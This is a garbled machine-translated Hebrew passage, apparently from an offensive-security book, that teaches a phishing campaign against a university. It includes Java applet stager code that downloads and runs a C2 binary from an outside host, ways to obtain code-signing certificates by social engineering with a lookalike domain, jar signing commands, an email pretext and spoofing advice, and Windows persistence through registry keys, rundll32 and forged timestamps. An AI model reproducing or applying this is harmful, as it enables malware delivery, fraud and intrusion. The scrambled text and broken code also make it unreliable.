‫ל בצע את המ שימות ה כ בדות‪ .‬אני ממ ליץ ב חום ע ל המ סגרת ש ל ‪Selenium,‬אותה תו כ לו למצוא‬
‫כאן‪:‬‬
‫‪http://www.seleniumhq.org/‬‬
‫זהו ס ט מדהים ש ל כ לים חינמיים ל בדי קתיי שומי אינ טרנ ט שי כו לים לייצא מ שימות ס קריפ ט ל כ ל ד בר‬
‫מ קוד ‪ Python‬ל‪ #C-‬כדי לאפ שר או טומציה עדינה‪.‬‬
‫ע בור המת קפה הזו‪ ,‬עם ר ק כמה מאות כתו בות דוא" ל להידור‪ ,‬נ לך בדרך הידנית ונ כיר מע ט את המ טרות‪.‬‬
‫אם תמ שיך עם ו ק טור הת קפת אימיי ל‪ ,‬ע ליך כעת לה ח לי ט כיצד תו כ ל להרווי ח חדירה רא שונית לר שת‬
‫היעד‪ .‬מא קרו ‪ VBA,‬לפי הפר ק הרא שון‪,‬יהיה מע ט מגו שם ע בור הת קפה ב קנה מידה גדו ליותר כמו זו וזו‬
‫דור שת גם הת קנת ‪ Microsoft Office.‬ב ס בי בה א קדמית ס ביר להני ח ש למ שתמ שים תהיה ס ט כ לים שונה‬
‫בהר בה‪ ,‬כמו גם ה סתמ כות ע ל מער כות הפע לה א חרות מ ל בד ‪Microsoft Windows.‬זה מצי ב אתגר‬
‫מעניין ‪-‬איך אתהי כו ל לפרו ס מ טען דרג שיפע ל ב כ ל ס בי בה‪ ,‬ו בהת ב ס ס ע ל מה שהוא מג לה‪ ,‬להוריד‬
‫ו להת קין את ת שתית הפי קוד וה ב קרה המתאימה? הת שו בה היא לה שתמ ש ‪ -Java.‬ב‬
‫א ספ קת מ טען ח ל ק ‪ 2:‬שימו ש ביי שומון ‪ Java‬ע בור מ ש לו ח‬

‫מ טען‬
‫י שנם מ ספר ניצו לים והת קפות ש ל ‪ Java‬מר חפים ב ט בע‪.‬‬
‫ש כ ח מהם‪ .‬אתה רוצה ל קוד כ לים מ ש לך מהי סוד שייראו לגי טימיים כ כ ל האפ שר ויו כ לו‬
‫לע בור דרך כ ל ניתו ח תנועה ש ל זיהוי תו כנות זדוניות וזיהוי פריצות מ בו ס ס מאר ח‪.‬‬
‫זרימת ההת קפה היא כד ל קמן‪:‬‬
‫פת חיי שומון ‪ Java‬ופרו ס אותו בתוך ס בי בה מ בו ס סת אינ טרנ ט מ ש כנעת‪ .‬עוד ע ל‬
‫כך ב קרו ב‪.‬‬
‫פרו ס הת קפת הנד סה ח ברתית נגד המ שתמ שים שזוהו בע בר כדי לעודד אותם‬
‫ל ב קר באתר זה‪.‬‬
‫לא חר ה ביצוע‪ ,‬היי שומון חיי ב ל ק בוע אם הוא נמצא ב ס בי בת ‪Windows, OSX‬או‬
‫‪ Linux‬ו להוריד את סו כן ‪C2‬המתאים‪ .‬זהי כ לו ל כמו בן קידוד מ חד ש ש ל ה‪ ,2C-‬א ב ל‬
‫זה ב שפת ‪C‬אז זה צריך להיות מינימ לי‪.‬‬
‫‪Java‬היא לא שפה ק שה ל לימוד‪ ,‬אז א ל תדאג אם אתה לא מ כיר אותה‪ .‬אני כו ל ל את כ ל‬

‫מה שאתה צריך‪ ,‬כו ל ל קוד‪ ,‬כדי להת חי ל‪.‬‬
‫חתימת קוד ‪ Java‬ב ש בי ל ה כיף והרוו ח‬

‫לפני שאמ שיך ה לאה‪ ,‬כדאי להז כיר שמאז עד כון ‪ Java 8 20,‬לאיפע לויי שומוני ‪Java‬‬
‫א לא אם ה קוד חתום ע לידי ר שות מו כרת‪ .‬חתימת קוד הייתה מ שהו ש כנראה נ שמע‬
‫כמו רעיון טו ב ב שנות ה‪ ,09-‬כא שר התה ליך ש ל ר כי שת תעודת חתימה היה הר בהיותר‬
‫ק שה ‪-‬היית צריך מ ספר דאן אנד ברד ס טרי ט‪ ,‬ח ברה מאוגדת ו כתו בת דואר מאומתת‪.‬‬
‫בימים א לה ע ס קי חתימת ה קוד הם‪ ,‬ו ב כן‪ ,‬ע ס קים גדו לים‪ .‬זה מאוד ת חרותי והם רוצים‬
‫את המ ס חר ש לך אז הם עדייןיע שו אימות ק טן שאתה מי שאתה אומר שאתה‪ ,‬א ב ל זה‬
‫יהיה המינימום המינימ לי‪ .‬אתהי כו ל ב ק לות ל ק ב ל ה סמ כה עם קצת הנד סה ח ברתית‪.‬‬
‫קמעונאי גדו ל ש ל תעודות חתימת קוד מציין את הד ברים ה באים באתר האינ טרנ ט ש לו‪:‬‬
‫‪1.‬י ש לוודא את קיומו ה חו קי ש ל הארגון או האדם הנ קו ב ב שדה הארגון ש ל‬

‫תעודת חתימת ה קוד‪.‬‬
‫‪2.‬המיי ל שא ליוי ש ל ש לו ח את אי שור חתימת ה קוד חיי ב להיות‬
‫‪ someone@domain.com,‬כא שר ‪domain.com‬הוא ב בע לות הארגון ש שמו‬

‫בתעודת חתימת ה קוד‪.‬‬
‫‪3.‬י ש ל בצע הת ק שרות חוזרת למ ספר ט לפון מאומת לארגון או לאדם הנ קו ב בתעודת‬
‫חתימת ה קוד ע ל מנת לוודא כי מ בצע ההזמנה הינו נציג מור שה ש ל הארגון‪.‬‬
‫ניתן לה שתמ ש בה ליך זה כדי ל ק ב ל ב ק לות אי שור חתימת קוד‪:‬‬

‫ר שום שם דומיין הדומה לע ס ק קיים‪ .‬ש קו ל את ארגון היעד ש לך ‪ -‬מה ע שוי להיות‬
‫ר לוונ טי?‬
‫ש כפ ל ואר ח את האתר באמצעות הפ קודה ה באה‪:‬‬
‫)‪wget -U "Mozilla/5.0 (X11; U; Linux; en-US; rv:1.9.1.16‬‬
‫‪wait http://www.example.com/docs/interesting-part/ -- domains=www.example.com‬‬
‫‪--page-requisites --html-extension --convert-links --no parent --wait=3 --random-‬‬
‫‪Gecko/20110929 Firefox/3.5.16" --recursive --level=1 --no clobber‬‬
‫שנה את כ ל הפר טים ליצירת ק שר ב ט לפון באתר המ שו ב ט כך שיצ ביע א ליך‪.‬‬

‫ש קו ל ח ברה מ חוץ לת חום הע ס קים הרגי ל ש ל חותם ה קוד כדי למנוע חיפו שים‬
‫ב חדר המ ס חר ) בפוע ל א לו מ בוצעים ר ק לעתים ר חו קות(‪.‬‬
‫הצ ל חתי לר כו ש אי שורי חתימת קוד עם כתו בת דוא" ל שנ שמעת ס בירה ב ל בד‬
‫ו ט לפון ס לו לרי‪ .‬ז כור‪ ,‬אתה ה ל קו ח והם רוצים את ה כ סף ש לך‪.‬‬
‫כמו בן‪ ,‬מ כיוון שאתה מ בצע דוגמנות ‪ APT‬באופן לגי טימי‪ ,‬אתהי כו ל לה שתמ ש בי שות‬
‫מ שפ טית מ ש לך‪ .‬זה ת לוי בך‪.‬‬
‫במו בן מ סוים‪ ,‬א כיפת חתימת קוד היא הד בר ה טו ב ביותר שי כו ל היה ל קרות למ ח ברי‬
‫תו כנות זדוניות ‪ -Java,‬ב מ כיוון שהיא או כפת מוד ל א ב ט חה לא מציאותי ל ח לו טין שמרגיע‬
‫את המ שתמ שים לת חו שת בי ט חון כוז בת‪ .‬חתימת קוד בעצם עו בדת כך ‪-‬אתה המ שתמ ש‬
‫סומך ע ל צד ש לי שי שמעו לם לא פג שת )מ ח בר ה קוד( מ כיוון שצד ש לי שי א חר שמעו לם‬
‫לא פג שת ) חותם ה קוד( אמר את ה קוד ) שהוא מעו לם לא ראה ( ב טו ח להפע לה‪.‬‬
‫ימין‪.‬‬
‫כמו בן‪ ,‬הנ קודה הרא שונית הייתה לה ב טי ח ש כ ל ה קוד ניתן למע ק ב‪ ,‬א ב ל זה מ שהו‬
‫שא בד באמת ו בתמים בדרך‪.‬‬
‫ה ט כני קה ה ב סי סית שאנו מדגימים כאן היא כזו ש ח בי בה ע ליה מאוד‬
‫צוותי חדירת ר שת ‪NSA/GCHQ‬או מה שנ קרא ‪Tailored Access Operations‬‬
‫צוותי חדירת ר שת ‪NSA/GCHQ‬או מה שנ קרא ‪Tailored Access Operations‬וי ש‬

‫סי בה‪ :‬זה ק ל וזה עו בד‪ .‬אינך ז קו ק לפור טפו ליו ש ל ניצו ליום אפ ס כדי ל ק ב ל גי שה‬
‫ל ס בי בות מאו ב ט חות כא שר אנ שים מריצים ג'אווה‪ ,‬א שר פרו סה כמע ט אוני בר ס לית‪.‬‬
‫עם כ ל זה ב ח ש בון‪ ,‬בואו ניג ש ל קצת קידוד ‪ Java.‬קודם כ ל‪ ,‬הורד את ‪ )Java SE JDK‬לא‬
‫)‪ JRE‬מאתר אור ק ל‪ .‬מ סי בות בור חות ממני‪ ,‬מת קין ‪Java‬אף פעם לא מגדיר נ כון את‬
‫מ שתנה הנתי ב‪ ,‬אז תצ טרך לע שות זאת בעצמך ) שנה זאת ע בור הגר סה(‪:‬‬
‫‪set path=%path%;C:\Program Files\Java\jdk1.8.0_73\bin‬‬
‫אתה לא רוצה להמ שיך ל חתום ע ל כ ל מ בנה ש ל קוד ה בדי קה ש לך; זה הו לך להיות‬
‫מייגע מהר מאוד‪ .‬תצ טרך לע שות את הפעו לות ה באות כדי להגדיר את ס בי בת הפיתו ח‬
‫ש לך‪ .‬הו סף את המ ח ש ב המ קומי ש לך כ חריג ל כ ל ל חתימת ה קוד‪ ,‬כפי שמוצג באיור ‪2.1.‬‬
‫איור ‪2.1:‬אפ שר ל כ ל קוד ‪-Java‬ההמ קומי לפעו ל בדפדפן‪.‬‬

‫קוד ‪ Java‬מת חי ל ב קו בצי ט ק ס ט רגי ל עם סיומת ‪.java‬א שר נער כים לא חר מ כן ל ק בצי‬
‫‪ .class .‬לא ניתן ל חתום ע ל ק בצי כיתה ו ל כןי ש לאגד אותם באר כיוני ‪ jar‬למ טרות ש לך‪.‬‬
‫לה לן דוגמה פ שו טה להמ ח שה ש ל ‪HelloWorld :‬‬
HelloWorld { ‫כיתה צי בורית‬
public static void main(String[] args) {
;("!‫ עו לם‬,‫)" ש לום‬nltnirp.tuo.metsyS

}
}
:‫ והידור כך‬HelloWorld.java ‫שמור את זה בתור‬
javac HelloWorld.java
:‫א שר מתנה לת כך‬HelloWorld.class, ‫פעו לה זו תיצור את‬
java HelloWorld
:‫אתה אמור לראות את פ ל ט התו כנית‬Java. ‫זה מפעי ל את מתורגמן‬
!‫ש לום עו לם‬
.‫ א ב ל אתה רוצה שה קוד ש לךירוץ בתוך דפדפן אינ טרנ ט‬,‫ה כ ל טו ב ויפה‬
‫ה קוד אז צריך להיות מע ט שונה כדי לר שת פונ קציונ ליות מ סוימת שהוא צריך לפעו ל‬
:‫כיי שומון‬
‫יי בוא‬java.applet.Applet; ‫יי בוא‬

java.awt.Graphics;
void paint(Graphics g) { g.drawString("Hello world!", 50, 25);

public class HelloWorld extends Applet { public
}
}
:‫ ק טן באותה ספרייה עם ה קוד ה בא‬HTML ‫צור קו בץ‬
<HTML>
<HEAD>
</TITLE> ‫<תו כנית פ שו טה‬TITLE>
</HEAD>
<BODY>
:‫הנה הפ ל ט ש ל התו כנית ש לי‬
WIDTH=150 HEIGHT=25> </APPLET> </BODY> </HTML>

<APPLET CODE="HelloWorld.class"
‫שמור את ה קו בץ הזה בתור ‪ test.html‬ו טען אותו לדפדפן ש לך‪ ,‬כפי שמוצג באיור‬
‫‪2.2.‬‬
‫איור ‪2.2:‬יי שומון ‪ Java‬פוע ל בדפדפן‪.‬‬

‫כפי שצוין קודם ל כן‪ ,‬ב ש ל ב מ סוים תצ טר כו לאגד את קו בץ ‪- .class‬ה לתוך אר כיון ‪raj.‬‬
‫כך שניתןיהיה ל חתום ע ליו ב קוד‪ .‬זה מו שג ב ק לות ואתה צריך ל שנות מע ט גם את קוד‬
‫ה‪ LMTH-‬ש לך‪:‬‬
‫‪jar cf helloworld.jar HelloWorld.class‬‬
‫ו‬
‫>‪<HTML‬‬
‫>‪<HEAD‬‬
‫>‪<TITLE‬תו כנית פ שו טה >‪</TITLE‬‬
‫>‪</HEAD‬‬
‫>‪<BODY‬‬
‫הנה הפ ל ט ש ל התו כנית ש לי‪</applet> :‬‬

‫>‪width=120 height=120‬‬
‫"‪code=HelloWorld.class archive="helloworld.jar‬‬
‫‪<applet‬‬
‫>‪</BODY‬‬
‫>‪</HTML‬‬
‫הפ ש טות עצמה‪.‬‬
‫כתי בת ‪ Java Applet Stager‬בעי קרו ש ל ד בר‪ ,‬מה שאתה רוצה לע שות‬
‫הוא לא במר ח ק מי ליון קי לומ טרים מהמ טרה ש ל הפר ק ה קודם ‪-‬הורד‬
‫והפע ל מ טען ‪ C2.‬עם זאת‪ ,‬הפעם אתה הו לך להני ח את קיומן ש ל ש לו ש‬
‫מער כות הפע לה פו טנציא ליות‪ Windows, Apple OSX, ,‬ונגזרות לינו ק ס‬
‫ר בות‪ .‬זהידרו ש ה ב חנה מ סוימת מצד ‪-stageer‬ה ו קידומו מ חד ש ש ל‬
‫מ טען ה‪ 2C-‬עצמו ) בעי קר מינו ח נתי ב ק בצים והתמדה(‪ ,‬א ב ל כ ל ש לו ש‬
‫הפ ל טפורמות תומ כות ב‪ C-‬ו‪libssh, -‬אז זה טריוויא לי‪ .‬אתה ת שנה מאוד‬
‫את שרת ‪C2‬‬
‫מוד ל גם ע בור בדי קה זו כדי להו סיף פונ קציונ ליות נו ספת הנ חוצה‪.‬‬
‫הר כי ב את ה קוד ה בא‪:‬‬
‫מ ח ל קה צי בורית { ‪OSDetect‬‬
‫{ )‪public static void main(String[] args‬‬
‫;))"‪System.out.println(System.getProperty("os.name‬‬
‫}‬
‫}‬
‫הפ ל ט חו שף את מער כת ההפע לה הנו כ חית‪ .‬לדוגמה‪:‬‬

‫ווינדו ס ‪7‬‬
‫אתהי כו ל לה שתמ ש בפונ קציות שונות כדי ל ק בוע כ ל מיני מאפיינים ש ל ‪Machine‬‬
‫‪ Java Virtual‬שמצאנו את עצמנו בה ומידע שימו שי א חר ע ל המאר ח‪ ,‬א ב ל כרגע‬
‫מער כת ההפע לה מתאימה לצר כים ש לך‪ .‬ב כ ל הנוגע ‪ -Windows,‬לאני בדרך כ ל ל לא‬
‫עו ס ק במי קוד לפ ל טפורמות ‪x86‬או ‪ x64‬בנפרד להע ברת מ טען; ‪ x86‬עו בד ב סדר‬
‫כמע ט ל כ ל מה שאתה רוצה לע שות‪ .‬עם זאת‪,‬י שנן סי בות טו בות ל ק חת זאת ב ח ש בון‬
‫כא שר אתה מ בצע ניצו ל או הע ברה ש ל תה לי כי ‪ x64‬ספציפיים מאוד‪ ,‬א ב ל זה לא מע סי ק‬
‫אותנו כאן‪.‬‬
‫קדימה‪ ,‬בואו ניצור ש ל ב כ כ לי שורת פ קודה למ טרות בדי קה‪ .‬מאו חריותר נארוז אותו‬
‫לתוךיי שומון ונ כין אותו לת קיפה‪ .‬ראה רי שום ‪ 2-1.‬קוד זה מיי בא את ה ספריות הדרו שות‬
‫לת ק שורת בר שת‪ ,‬בוד ק באיזו מער כת הפע לה היעד פוע ל ומוריד את ה‪ 2C-‬המתאים‪.‬‬
‫זה פ שו ט ב כוונה למ טרות המ ח שה‪ .‬ה קוד הזהירוץ "מה קופ סה" אז ת ש ח ק איתו ות שפר‬
‫אותו‪.‬‬
‫רי שום ‪2-1:‬ת בנית ע בור ג'אווה ב סי סית‬

‫ַ ּב עַ ל נִ סָי ֹון‬
‫יי בוא ;‪java.io.BufferedInputStream‬יי בוא‬

‫;‪java.io.ByteArrayOutputStream‬יי בוא ;‪java.io.FileOutputStream‬‬
‫יי בוא ;‪java.io.IOException‬יי בוא ;‪java.io.InputStream‬יי בוא‬
‫;‪ java.net.URL‬מ ח ל קה צי בורית { ‪JavaStager‬‬
public static void main(String[] args) {

String OS = System.getProperty("os.name").toLowerCase();
private static
URL ‫ קי שור כתו בת‬if (isWindows()) { try { String fileName = "c2.exe";

= new BufferedInputStream(link.openStream());//:ptth")‫ חד ש‬URL =
yourc2url.com/c2.exe"); InputStream in
byte[] buf = new byte[1024]; int n = 0; while (-1!=(n=in.read(buf)))

ByteArrayOutputStream out = new ByteArrayOutputStream();
{out.write(buf, 0, n);
}
fos = new FileOutputStream(fileName); ;()‫ ב קרו ב‬out.close();

;(‫)תגו בה‬etirw.sofbyte[] response = out.toByteArray(); FileOutputStream
catch(IOException ioe){} ‫תה ליך תה ליך‬fos.close();
= new ProcessBuilder("c2.exe").start(); }
} else if (isMac()) {
{ ‫נ סה‬
String fileName = "c2_signed_mac_binary";
‫קי שור כתו בת אתר = חד ש‬
InputStream in = new BufferedInputStream(link.openStream());
URL("http://yourc2url.com/c2_signed_mac_binary");
new byte[1024]; int n = 0; while (-1!=(n=in.read(buf))) {out.write(buf, 0, n);

ByteArrayOutputStream out = new ByteArrayOutputStream(); byte[] buf =
}
FileOutputStream fos = new FileOutputStream(fileName); ;()‫ ב קרו ב‬out.close();
byte[] response = out.toByteArray();
fileName = "linux_binary"; ‫תה ליך תה ליך‬fos.close(); ;(‫)תגו בה‬etirw.sof

catch(IOException ioe){} } else if (isLinux()) { try { String
‫ = קי שור‬new ProcessBuilder("c2_signed_mac_binary").start(); }
‫כתו בת אתר = חד ש‬
InputStream in = new BufferedInputStream(link.openStream());

URL("http://yourc2url.com/c2_signed_mac_binary");
new byte[1024]; int n = 0; while (-1!=(n=in.read(buf))) {out.write(buf, 0, n);

ByteArrayOutputStream out = new ByteArrayOutputStream(); byte[] buf =
}
fos = new FileOutputStream(fileName); ;()‫ ב קרו ב‬out.close();
;(‫)תגו בה‬etirw.sofbyte[] response = out.toByteArray(); FileOutputStream
+x linux_binary;./linux_binary").start(); } catch(IOException ioe){} } else {
fos.close(); Process process = new ProcessBuilder("chmod
}
}
public static boolean isWindows() {
return (OS.indexOf("win") >= 0);
public static boolean isMac() {
return (OS.indexOf("mac") >= 0);

}
public static boolean isLinux() {
return (OS.indexOf("nux") >= 0);
}
‫}‬
‫אנו מ שתמ שים ת חי לה בפונ קציה )"‪ System.getProperty("os.name‬כדי ל ק בוע את מער כת ההפע לה‪.‬‬
‫אמנם אתהי כו ל להתעמ ק קצתיותר )ע בור גר סאות א חרות ש ל ‪ UNIX‬למ ש ל(‪ ,‬זה מ ספי קי סודי לצר כים‬
‫ש לך‪ .‬לא חר שמער כת ההפע להידועה‪-Stagger ,‬ה מוריד ומ בצע את המ טען המתאים ע בור אותה‬
‫פ ל טפורמה‪.‬‬
‫שם ה קו בץ ש ל המ שתנה מגדיר הי כןיי כת ב המ טען ע ל המאר ח והפניות למ שתנה ש ל כתו בת האתר ש בהן‬
‫‪-stageer‬הי כו ל למצוא את המ טען באינ טרנ ט‪.‬‬
‫ה קפד ל חתום גם ע ל קו בץ ההפע לה ש ל ‪Mac‬או שת ק ב ל הודעות הר שאה לא נו חות שיוצגו למ שתמ ש‪.‬‬
‫לא קיימות בעיות כא לה עם ‪ Windows‬ו‪ ;xuniL-‬הםי בצעו ב שמ חה את מה שניתן להם ל לא אזהרות‬
‫למ שתמ ש‪.‬‬
‫כדי להמיר את זה ליי שומון‪ ,‬ע ליך ליי בא את ה ספרייה המתאימה‪:‬‬
‫יי בוא ;‪java.applet.Applet‬‬
‫ו ל שנות‪:‬‬
‫מ ח ל קה צי בורית { ‪JavaStager‬‬
‫ל‪:‬‬
‫מ ח ל קה צי בורית ‪ JavaStager‬מר חי בה אתיי שומון {‬
‫ארוז את קו בץ ‪-.class‬ה ל‪.jar: -‬‬
‫‪jar cf stager.jar JavaStager.class‬‬
‫וה כן את ה‪ LMTH-‬ש לך‪:‬‬
‫>‪<HTML‬‬
‫>‪<HEAD‬‬
‫>‪ <TITLE‬עי לה מ ש כנעת >‪height=120> </applet‬‬
‫‪archive="stager.jar" width=120‬‬
‫‪HEAD> <BODY> <applet code=JavaStager.class‬‬
‫‪</TITLE> </‬‬
‫>‪</BODY‬‬
‫>‪</HTML‬‬
‫צור עי לה מ ש כנעת‬
‫צור עי לה מ ש כנעת תצ טרך ל ח שו ב הי כן אתה רוצה להוריד את ה ק בצים‬

‫הא לה‪ .‬בדוגמה ה קודמת ) כ שהםיומרו ליי שומון(‪ ,‬הםיע ברו למ טמון ‪Java,‬‬
‫שהוא ר חו ק מ להיות אידיא לי‪.‬‬
‫עדייןי ש לך שני ד ברים שאתה צריך לע שות ‪ -‬ליצור עי לה מ ש כנעת ) כ לומר‪ ,‬אתריפה‬
‫ואמין( ו ל חתום ע ל קו בץ ‪-jar .‬האז המת קפה הזו תהיה מו כנה לעוף‪.‬‬
‫ה שמיים הם פ חות אויותר הג בו ל לג בי כמה ר חו ק אתהי כו ל ל ל כת כ שאתה מעצ ב‬

‫תירוצים‪ ,‬א ב ל ז כור כאן שהת קפה מוצ ל חת או מ סו כ לת ‪-‬הר בהיותר מא שר עם‬
‫הפר טים ה ט כניים‪.‬‬
‫אני ממ ליץ לך לע שות את המ ח קר ש לך ו להיות אמן‪.‬‬

‫במ קרה זה‪ ,‬תיצור אתר עם סגנון ה בית ש ל המ כ ל לה המות קפת‪ ,‬ת טמיע בו את היי שומון‬
‫העוין ש לך ותפתה את המ טרות ש לך ל ב קר באתר‪ .‬זה צריך להיראות ר שמי‪ ,‬א ב ל‬
‫אימיי לים ר שמיים נו חתים בתי בות הדואר הנ כנ ס ש ל אנ שים כ ל היום‪ ,‬אז זה גם צריך‬
‫ל ב לו ט מ ב לי להיראות כאי לו זה מנ סיך ניגרי‪ .‬ב לי לרצות להי שמע כמו פ סי כופת‪ ,‬לתמרן‬
‫אנ שים זה ק ל כ שאתהיודע מה גורם להם לת קת ק‪ .‬בעו לם ה חתוך ש ל מ כירות או תיווך‬
‫במניות‪ ,‬כ ל ד בר שנראה כמעני ק למי שהויתרון ע ל ה קו לגות ש לו עו בד הי ט ב‪ ,‬א ב ל‪ ,‬אם‬
‫ה כ ל שווה‪ ,‬אנ שי א קדמיה אינם מונעים בדרך כ ל ל ע לידי ר כי שת עו שר‪.‬‬
‫זה לא מ שנה אם אתה פיזי קאי או אר כיאו לוג‪ ,‬המ ט בע האמיתי בעו לם הא קדמי הוא‬
‫יו קרה‪" .‬פר סם או לא בד" הוא ה בי טוי שהומצא כדי לתאר את ה ל חץ בא קדמיה לפר סם‬
‫במהירות ו באופן מתמ שך ע בודה כדי ל קיים או ל קדם את ה קריירה‪ .‬זה מינוף שאתהי כו ל‬
‫לה שתמ ש בו‪ .‬עי לה נו ספת שעו בדת טו ב מאוד היא חנופה ‪-‬צרו הת קפה שמנצ לת את‬
‫הרעיונות ה ל לו ותוציאו לפוע ל את המ טען ש ל כם‪.‬‬
‫צור אתר ב שם "מצא מומ חה"‪ ,‬שתרמוז שהוא מ שויך ומנוה ל ע לידי האוני בר סי טה‪ .‬זה‬
‫יתיימר להיות ספרייה חד שה שת ק ל ע ל מומ חים ל ק ב ל הזמנות להת ק שרויות די בור‬
‫ו כדומה‪ .‬כ ל מה שצריך זה הר שמה חינם‪ .‬ההזמנה תהיה מותאמת אי שית ותראה כאי לו‬
‫היא מ קורה במ כ ל לה‪ .‬אתהי כו ל ל ש לו ח דוא" ל ב כ ל אמת לה ל כ ל א חד במ כ ל לה ו כא שר‬
‫הואיענה‪ ,‬תהיה לך את ה כותרת הת חתונה ש ל הדוא" ל ה ס טנדר טית ש ל האוני בר סי טה‬
‫שתו כ ל להעתי ק ו להתאים אי שית כדי להתאים לצר כים ש לך‪.‬‬
‫זיוף אימיי ל‬
‫זיוף אימיי ל‬
‫זיוף דוא" ל הוא כ ל כך טריוויא לי שאני לא מ בז בז כאן מ קום לדון בזה‪.‬‬

‫למרות שאני נוגע בנו שאים מת קדמים כגון ‪ SPF, DKIM‬ו ט כנו לוגיות א חרות‬
‫להגנת דומיינים ש ל דואר א ל ק טרוני בהמ שך ה ספר‪ .‬אם אינך מ כיר זיוף דוא" ל‪,‬‬
‫י שנם מ שא בים ר בים באינ טרנ ט להתיי ח ס א ליהם‪ ,‬אך את חי ל עם ה‪RFC FTEI-‬‬
‫העד כני ביותר ע ל דוא" ל ‪SMTP:‬‬
‫‪https://tools.ietf.org/html/rfc6531‬‬
‫חתימת ‪-Stager‬הזה מ שאיר את ה חתימה ב קוד ‪ -Stager.‬ל לא חר שר כ שנו את האי שור‬

‫מה ספ ק‪ ,‬הדרך ה ק לה ביותר לע שות זאת היא כד ל קמן‪.‬‬
‫ייצא את ק בצי ‪)PVK‬מפת ח פר טי( ‪-SPC‬ו)אי שור( ל קו בץ ‪ PFX/P12‬באמצעות ה כ לי‬

‫‪ pvkimprt‬ש ל ‪Microsoft.‬‬
‫‪pvkimprt -import -pfx mycert.spc javakey.pvk‬‬
‫יי בא את קו בץ ‪-PFX‬ה למאגר מפת חות חד ש ש ל ‪ Java‬באמצעות ‪PKCS12Import‬‬

‫והזן את סי סמת מאגר המפת חות כא שר תת ב ק ש‪.‬‬
‫‪java pkcs12import mycert.pfk keystore.ks‬‬
‫חתום ע ל קו בץ ‪-jar‬ה עם ה כ לי ‪jarsigner .‬‬

‫‪jarsigner -keystore keystore.ks stager.jar‬‬
‫מ שו בצת באתר המזויף ש לך‪ ,‬מת קפה זו מו כנה ל בדי קה‪ ) .‬ותע שה בדי קה‪ ,‬באמת‪ ,‬כי‬
‫אם ת ק ל ק ל את ההת קפה הרא שונית ש לך‪ ,‬המ טרה ש לך תהיה מודעתיותר ותהיה ע ל‬
‫המ שמר‪ .‬ואז בדו ק את זה שו ב‪(.‬‬
‫הערות ע ל התמדה במ טען‬

‫בפר ק ה קודם דנתי‪ ,‬אם כי ב קצרה‪ ,‬ברעיון ההתמדה ‪ -‬כ לומר המ טען שי כו ל ל שרוד‬
‫את חו לים מ חד ש‪.‬י שנן דר כים ר בות לע שות זאת‪ ,‬וע כ שיו כ שאנ חנו מתמודדים עם‬
‫מער כות הפע לה מרו בות ה בעיה מתר בה‪ .‬ה שי טה המתוארת בפר ק ‪1‬תע בוד א ב ל היא‬
‫לא מאוד חמ קנית‪ .‬ע כ שיו כ שאתה מע לה את המ ש ח ק ש לך‪ ,‬זה נראה כמו זמן טו ב‬
‫ל חזור ע ל הרעיון עם כמה הצעות טו בותיותר‪.‬‬
‫‪Microsoft Windows‬‬
‫י ש הר בה דר כים להפע לה או טומ טית ש ל קוד ‪ -Windows,‬ב מע בר למו בן מא ליו‬

‫והנפוץ ביותר‪:‬‬
‫‪HKCU\Software\Microsoft\Windows\CurrentVersion\Run‬‬
‫מי קרו סופ ט כ ל לה כמה מפת חות שנועדו במ קור ר ק ל בדי קה אך מעו לם לא הו סרו; אתה‬
‫י כו ל להפעי ל קוד מ שם באותו אופן‪:‬‬
‫‪HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File‬‬
‫אפ שרויות ביצוע‬
‫א ֹו‬
‫‪HKLM\Software\Wow6432Node\Windows NT\CurrentVersion\Image File‬‬

‫אפ שרויות ביצוע‬
‫כ שמ שתמ שים ‪ -Registry‬ב)או בעצם כ ל שי טת הפע לה או טומ טית(‪ ,‬כדאי לזייף את‬
‫חותמת הזמן ע ל קו בץ ההפע לה כדי שזהייראה כאי לו הוא שם כ בר הר בה זמן במ קום‬
‫להופיע פתאום ביום ש ל ח שד להת קפה‪ .‬ראיתי אנ לי ס טים מ שפ טיים מנו סים מאוד מ טעים‬
‫תו כנות זדוניות בע בר‪ ,‬כי לא ע לה בדעתם שניתן ל שנות ב ק לות את חותמת הזמן‪.‬‬
‫שירותים הם דרך פופו לרית מאוד להת קנת תו כנות זדוניות‪ .‬ה‪ exe.-‬ש לךיצ טרך להיות‬
‫מור כ ב במיו חד כ שירות ‪Windows‬אם מ סתתר בדרך זו או שמער כת ההפע לה תהרוג אותו‪.‬‬
‫דרך נו ספת היא לגרום ‪ -Stagger‬ל ש לך להוריד ‪ DLL‬במ קום ‪ EXE‬ו להפנות א ליו ממפת ח‬
‫רי שום באמצעות ‪rundll32:‬‬
‫‪RUNDLL32.EXE dllnameentrypoint‬‬
‫בהערה זו‪ ,‬ניתן לא ח סן ו להריץ ‪ JavaScript‬ברי שום‪:‬‬

‫;)'!‪rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('Boo‬‬
‫נראתה תו כנה זדונית ב ט בע המ שתמ שת ב שי טה זו כדי לא ח סן מ טען ברי שום עצמו‪.‬‬
‫עם זאת‪ ,‬במ קום לר שום את הדר כים הר בות ש בהן אתהי כו ל להתע ק ש ‪ -Windows,‬באני‬
‫ממ ליץ לר כו ש את ה כ לי ה חינמי ש ל ‪Microsoft sysinternals Autoruns:‬‬
‫‪https://technet.microsoft.com/en-gb/sysinternals/bb963902.aspx‬‬
‫כ לי ה שירות המפואר הזה מ כי ל את מ סד הנתונים הגדו ל ביותר ש ל שי טות הפע לה או טומ טית‬
‫ה קיימות )ע בוריותר מה טרי קים הפ שו טים ש ל הרי שום שהוז כרו כאן( והוא נמצא ב שימו ש‬
‫קיומה )ע בוריותר מה טרי קים הפ שו טים ש ל הרי שום שהוז כרו כאן( ומ שמ ש‬
‫בהתע ס קויות ניתו ח מ שפ טי ותו כנות זדוניות‪ .‬הואיודע כמה ד ברים מוזרים באמת‪.‬‬
‫שי טה א חת שאני אוה ב והיא בדרך כ ל ל סאונד כו ל לת ה ח לפת ‪ EXE‬שהתיי ח סו א ליו‬

‫במפת ח רי שום קיים במ טען ש לך ו לא חר מ כן הוראה למ טען ש לך ל בצע את ה קוד‬
‫המ קורי שה ח לפת‪ .‬הד בר נע שה בצורה ה טו בה ביותר באופןידני‪ ,‬מ כיוון שני סיון להפוך‬
‫זאת לאו טומ טיי כו ל להני ב תוצאות מעניינות‪.‬‬
‫בעת ה סתרת מ טענים‪ ,‬עדיף ל ב חור שם שאינו מעורר ח שד ) כ לומר‪Svchost.exe ,‬‬
‫‪ payload.exe).‬ו‪spoolsv.exe -‬יוצרים את המ טרות ה טו בות ביותר מ כיוון ש בדרך כ ל ל‬
